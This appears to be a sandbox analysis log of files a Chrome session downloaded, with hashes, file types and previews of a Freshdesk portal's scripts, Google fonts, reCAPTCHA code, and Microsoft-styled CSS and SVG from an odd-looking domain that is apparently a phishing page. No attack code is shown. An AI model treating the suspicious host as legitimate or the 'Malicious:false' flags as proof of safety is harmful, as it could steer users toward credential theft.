                                                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (23690), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):23690
                                                                                  Entropy (8bit):5.217951586433451
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:5558A33A41510ADF71792C6123967D27
                                                                                  SHA1:55A7CD9A269AAAAC9AA190A816B6932E1E764C8B
                                                                                  SHA-256:DF106D85E0FD0A64DDD6D483C19D59628704BD64A2D1541D550C28A4427B99B2
                                                                                  SHA-512:893C7F4E9DBF6B98EAC624D18FB537CC73A3D56A77CD1BE55EEDF9DBAAC5BEDAA95B3B480F6653D3D649D6028DE5336F5AD482603173DA1AFE7D7AAEE67382AF
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/head.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[43],{0:function(e,t,n){"use strict";function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),n.push.apply(n,r)}return n}function a(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?r(Object(n),!0).forEach(function(t){d()(e,t,n[t])}):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):r(Object(n)).forEach(function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))})}return e}function i(e){"loading"!==document.readyState?e():document.addEventListener("DOMContentLoaded",e)}function o(){var e,t=navigator,n=t.userAgent;return n.match(/chrome|chromium|crios/i)?e="chrome":n.match(/firefox|fxios/i)?e="firefox":n.match(/safari/i)?e="safari":n.match(/opr\//i)?e="opera":n.match(/edg/i)&&(e="edge"),e}function u(e){var t
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 14712, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):14712
                                                                                  Entropy (8bit):7.984524638079703
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:3AFEAE0D768769F5E5F30AC9805C5B70
                                                                                  SHA1:3ADA17C2B462DB3E7A1FD85C3F4670DFE7704F4D
                                                                                  SHA-256:0D0A6262C545E8BBC895116E5AFB22579C468D7ABB77E378F377D6FED57C1DCE
                                                                                  SHA-512:71C361AC0D7B72B222D4F087B46D1BEA318ED6652C4D37EC3403F0B0616482B5040232E06F2FCF13109CDF6151DC209E882C0DB40B2C6ACE4E2E0292FCDCDAB5
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://fonts.gstatic.com/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2
                                                                                  Preview:wOF2......9x.......8..9..........................n..<....`..b...|.@..d..6.$..D. ..|..4..v%.m.... FO.#F"l.d..#......?t..'$.2..n..Ye.1$..]...$s..W.s9.<%.L.1}Yy.6...-. b..[......7!..<K.W|.ij.f..?.\;.....N.$..T(.}.9."0n..........g)@.WE..@.....ZV..=U...;....}.:.t.H.B..H((2.E%$.@1...s.]..R]T..2..vQ.m.7....bm....T.....To.w..v)...H..).B!@..,.zB.ev.....3..L....[..z...\f[...BUV...^...0..8.....D.......\.$_e;.._../K.0.D..0.@..`...mn.....b......h..#.n?.A..}v.l..]yq.......*].#=N..9p..9b.8i.!Hl......(.p.>.....{..`.^}W..Fc.O.~.....f..a.%..k.I..e9@Ov.dH.M......i.T.....K.x|L1C..j..r.l..#.l/...=.Z...e...,k.<...A.A.I..]..@._...z.o.f2.....8,..?..qDUQ.S....a..L$V........K.d.F=~Ga..`.T.H......e{\...^..4cap...o!`9.-.d......._.k.Na..@.......`>.d.*.E...N....!.DE....`e.)P.R......Q.H....FA0..[U......I....d.......y{...J^...........]#...kH....0..}..C.|b}.n.....7$c. ...........y....-.0...}..D..#...>}.Q.....*...=R...?.4....n...5.!93"/<9Ao.v.e..Jw.S..0..RK...L..k..)....-...M.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (62449)
                                                                                  Category:downloaded
                                                                                  Size (bytes):1130172
                                                                                  Entropy (8bit):3.692651159147628
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:B578DD8FEDDECC93F97030C2257EC3C6
                                                                                  SHA1:4A547A4DD243E2CBCF9EE49B8A7D91D454AD3112
                                                                                  SHA-256:1833B25F71081782C58E06B9F53039A0DA3E220C13C7DC57B9C83895D96933CB
                                                                                  SHA-512:019064E34843B787B8B7E2CBF8739230779FA166292B868A1C5A8B2C67B49457DF278F8A3FDBBD70AD883BE38A79F945BE559DB57687899F537C1CF42A09DD54
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/styles/theme.css
                                                                                  Preview:./*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{display:-webkit-box;display:-ms-flexbox;display:flex;flex-direction:column;height:100vh;word-break:break-word}main{display:block}.h1,h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}code,kbd,samp{font-family:monospace,monospace;font-size:1em}.small,small{font-size:80%}sub,sup{font-size:75%}img{border-style:none;max-width:100%}button,input,optgroup,select,textarea{font-size:100%;line-height:1.15}button,input{overflow:visible}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusr
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1879), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):1879
                                                                                  Entropy (8bit):5.866038660197925
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:34417D7F5E9151B0ACF78894B26C2B73
                                                                                  SHA1:8106D9C4D3DE598CDCD80BB076B87487ED27B84F
                                                                                  SHA-256:2B00590F63EC0992A13997513E74D150B03FA5F61BB667246DCA49AB1E9D728B
                                                                                  SHA-512:B49551B16DF974DF865AE19FEBB35AC007E3651D8ABE91657263768EFEE9D20219010E68D27C456B0875D894B0638C1810E876C4227DBE06005F009A9BA21339
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://www.recaptcha.net/recaptcha/enterprise.js
                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.recaptcha.net/recaptcha/enterprise/';(cfg['enterprise']=cfg['enterprise']||[]).push(true);(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7uxtj3+hJmOcZFooFT0Ps276PuOqGnM1jfoPbFvxWp73VC60LnYGzayHVvcFeEiF0qrwy7fQAL+gGVXU+f9IQcAAACTeyJvcmlnaW4iOiJodHRwczovL3JlY2FwdGNoYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLab
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):2987
                                                                                  Entropy (8bit):4.347039769708609
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:1D0562C9D5CC0ADA15376281A5A04E61
                                                                                  SHA1:D16661298246286BA7803B6E407DECA0AC0B1A1B
                                                                                  SHA-256:E88327ADE4864F053AB8AD0733EEBE54066B924A33B44941D98FAB45A7A9ACC0
                                                                                  SHA-512:B3D0759C821ACB194B46C606E700917DE3A9D13A738687391D6BFC30C884652A1C74BFA363237E05C66A79403AE86EED07C504E27ABDFA8255D4F17E2A20EC18
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/support/recaptcha
                                                                                  Preview:..<!DOCTYPE html>.<html lang="en">..<head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>.</head>..<body>. <div id="recaptcha"></div>.. <script src='https://www.recaptcha.net/recaptcha/enterprise.js'></script>. <script type="text/javascript" id="executable-script">. var parentPort = null;.. // get port from parent. window.addEventListener('message', initPort);.. function initPort(e) {. if (e.origin === window.location.origin) { // to prevent messages from google captcha. if(!parentPort) {. // null: During rerender in iOS - Chrome browser, we could see another "chromium" onmessage handler overriding our parent port and setting it as null. This condition avoids overriding.. // undefined: CryptoPro Extension for CAdES Browser Plug-in is sending a message before the Recaptcha frame thereby setting the parent port to undefined FD-95435. parentPort = e.ports[0]. }. }. }.. window.onload = functio
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (3465), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):3465
                                                                                  Entropy (8bit):4.957485829070547
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:D71B2DD72CF8E5C9D72CA4F7D01E13D5
                                                                                  SHA1:51E4BD1F260450A25B66940131351E7AAB028BEF
                                                                                  SHA-256:92D8568CC12AF7B7E4CFF5FC25933630DF59392182F9C076B44A28AD18C6547A
                                                                                  SHA-512:3C9DFFADEE87AA65C38447BD4B70ADB03A539455BEF04D0E999DFE84DA2743C6A6A1C24F6B3A68F49842305CDED76CDCC5EC2502542091674A75229CE3CBED17
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/locales/en.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[53],{208:function(e,t){I18n.translations||(I18n.translations={}),I18n.translations.en=I18n.extend(I18n.translations.en||{},{enduser_marketplace:{error_messages:{global:{empty_message:"The message requested is empty",notify:{empty_type:"The notification type is empty",invalid_type:"Unsupported notification type"}},ticket:{invalid_field:"Invalid ticket field :: %{ticketFieldName}",invalid_value:"'value' is empty",set_options:{invalid_options:"Incorrect options given",invalid_tag:"Unable to set options to ticket field '%{fieldName}'",invalid_value:"'value' should be an array of option values"}}},ok_message:"ok"},portal_elements:{any:"Any",cancel:"Cancel",choose_more:"Choose More",close:"Close",confirm:{title:"Confirm Title"},default_placeholder:"Enter ",dropdown_default:"Choose...",error_messages:{liquid_tag_not_closed:"custom element '%{tagName}' is not closed"},next:"Next &gt;",none:"None",pagination:"Page Navigation",previous:"&lt;
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):12201
                                                                                  Entropy (8bit):5.518644197998511
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:B2E627877B449AF1EF4F507008409130
                                                                                  SHA1:D73502E47EFD46956E74B1BA24B7E6CFF18A5126
                                                                                  SHA-256:B37BE186CD91CB9F06A2BB5D63B2D4A1C1D4A99275F4B05E3A255A27E519692D
                                                                                  SHA-512:E61ED799C8BB8B7A2E50EF4B88335B66385ADE99B0D3451C22DA93EA0A4272CA85E4A06FDB1EB728651C509907C5E8B6ED9675565C95007904EF182798C2CC31
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:"https://fonts.googleapis.com/css?family=Source+Sans+Pro:regular,italic,600,700,700italic"
                                                                                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans Pro';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7qsDJT9g.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans Pro';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7jsDJT9g.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans Pro';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7rsDJT9g.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans Pro';. font-style: italic;. font-weight: 400;. src: url(https://fonts
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):80
                                                                                  Entropy (8bit):4.965634426587138
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:D2945485F4C01C7E78DD99DA57D1CC7D
                                                                                  SHA1:A657333FDA26E49352BD15D40D7CABE8D21D5DBE
                                                                                  SHA-256:8F481AFBF1EC7D3FC6F7A8F15EB6B9B1AC53E71CA70A0E7BEF279EBE0A9E866B
                                                                                  SHA-512:2D2CAD5112C58E35D611E8557457D05A0A11FA958285631C8208469E539CBA31D45E61A30126734780BF058E53B23F30D5B948CB4E11933664BEC3B9894DDC61
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhInCYX2nJm6REQOEgUNnkQuhRIFDTkSQs8SBQ1TWkfFIYz9BaBFg2iwEiAJIXOyT57lH5cSBQ2eRC6FEgUNORJCzyGM_QWgRYNosBIZCSEOY0DQoz-zEgUNU1pHxSGM_QWgRYNosA==?alt=proto
                                                                                  Preview:ChsKBw2eRC6FGgAKBw05EkLPGgAKBw1TWkfFGgAKEgoHDZ5ELoUaAAoHDTkSQs8aAAoJCgcNU1pHxRoA
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):1861
                                                                                  Entropy (8bit):7.230893105751945
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:A30B3E7D07F1830E7701ADA7A94B1D00
                                                                                  SHA1:0502547C89368E298D32794FC2E9F3BCD0CBA2E9
                                                                                  SHA-256:EDF150748BBA61AF2B9A1403EB66B143F31A98433DDB6D834660C75B11E95537
                                                                                  SHA-512:CC73E029826538E95D5E7C694FBB6FE9DEC04D9AA0BC244044840CB9EF8545FFFFDF2655730768973DD874322E112D184B518345151A6B4077D4AC967C4FC12A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/misc/logo.png
                                                                                  Preview:.PNG........IHDR...2...2......?......tEXtSoftware.Adobe ImageReadyq.e<...xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1346272b-9d31-4a01-a323-2b1300e8dfd4" xmpMM:DocumentID="xmp.did:9066439937C011E7AAC08289163B68E4" xmpMM:InstanceID="xmp.iid:9066439837C011E7AAC08289163B68E4" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:56786e9b-25e4-4536-8e81-437c7a8c9bb3" stRef:documentID="xmp.did:1346272b-9d31-4a01-a323-2b1300e8dfd4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...d...cIDATx...O.A..g...H0..`b.X
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 14824, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):14824
                                                                                  Entropy (8bit):7.984080702126934
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:48598BAD30F08E1C3EB3D0E69B420BD5
                                                                                  SHA1:28C2CF160273C2062F909A875C4B4C0541EE2F84
                                                                                  SHA-256:CA57B79A870BBF54700730858603A70D79743779C1B059922EC401BFDDC5ADC9
                                                                                  SHA-512:0033327198BD448927A53EADA9AED51ED4F8DA3C8619EDA3B10948F437213F20270C233F7FD403C8C192A05CAEED6905A02D8C62EC22B3885A6A7D6C018F737C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://fonts.gstatic.com/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3i54rwlxdu.woff2
                                                                                  Preview:wOF2......9...........9..........................n..6....`..b...P.x..d..6.$..D. ..|..4.gv%.m....B....y......sB.<....t..:S...@..\..w..x...8AMW.S......Z?.$.......mut....X..@.._.._$..Af'g...'.d.x.q&..T1Q_....n..z.._}...#v"......s.s......PiVBEW.2R.....8g....i.*..J.+Z.&..6trL.15.L.cn.D..!~N..WZ.DcJBB....$.<..T...ue.}...+..j..;:U..S...}.6a.iS.i.LId....K..`u.%.$...H..8<B.......a.`c.11..m=.*.....l.B9;..?...w.Je^i.8p.5......#........v.Y:.b...,....L.....(........;_.IvQ.K.X"J...(.,...O....[D.\...\.........I.k.;+.....b........Z...)......P.u.(@P....pQ..]...e...6F..v.'.....;..hW.=.B,*W..G....d... @...........(..9....R..\T.W)tvSz.4NU..rQu...|....<B!....H.k.)..!.8..@...............qS...9.k.lE.....I..[.S.}...*.0...}?.U.......@....a$X......'N....!I. 5.e..(....V...].... ....AVUN..:.s.......5.W.H.I......>....d...b.G.h.##.......q.zu.f^...O..s.]H?....(`..O.,.N;oo...G.4.~.N...C.......'.T.,..0W....z+?w.../\..B{.ebz.....OI.."._...~.211S1...... ........s...N..pC.(.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):1864
                                                                                  Entropy (8bit):5.222032823730197
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/klqlwHmS7lKqrxnlfVAWd5a4h2f4Au3G56DkTxaQxT1builqQgWxSgY0NDPBlt2wx220
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):26765
                                                                                  Entropy (8bit):5.114987586674101
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:1A862A89D5633FAC83D763886726740D
                                                                                  SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                  SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                  SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/12XAtvvfM2rKcdJNtii8919
                                                                                  Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):937
                                                                                  Entropy (8bit):7.737931820487441
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:FC3B7BBE7970F47579127561139060E2
                                                                                  SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                  SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                  SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):10796
                                                                                  Entropy (8bit):7.946024875001343
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                  SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                  SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                  SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):78627
                                                                                  Entropy (8bit):6.021125182969774
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:6AF145664EB7177B2280DFFA8492731C
                                                                                  SHA1:1E95F2F04E7B6335081E7CDBDCC48A4654A44ED3
                                                                                  SHA-256:0767863BFDE47D05640AD76BD3A33AA5CD7DFBA5391E1D80347F7EC41563E404
                                                                                  SHA-512:22D3022DA4B8E4374441ED29C40B6BA43856110D089260C905D55BC914106173A228829605995860BDD9E15E81A7DC87C1C16F37589AD5E63461C2A1125311E9
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://www.gstatic.com/recaptcha/releases/J79K9xgfxwT6Syzx-UyWdD89/styles__ltr.css
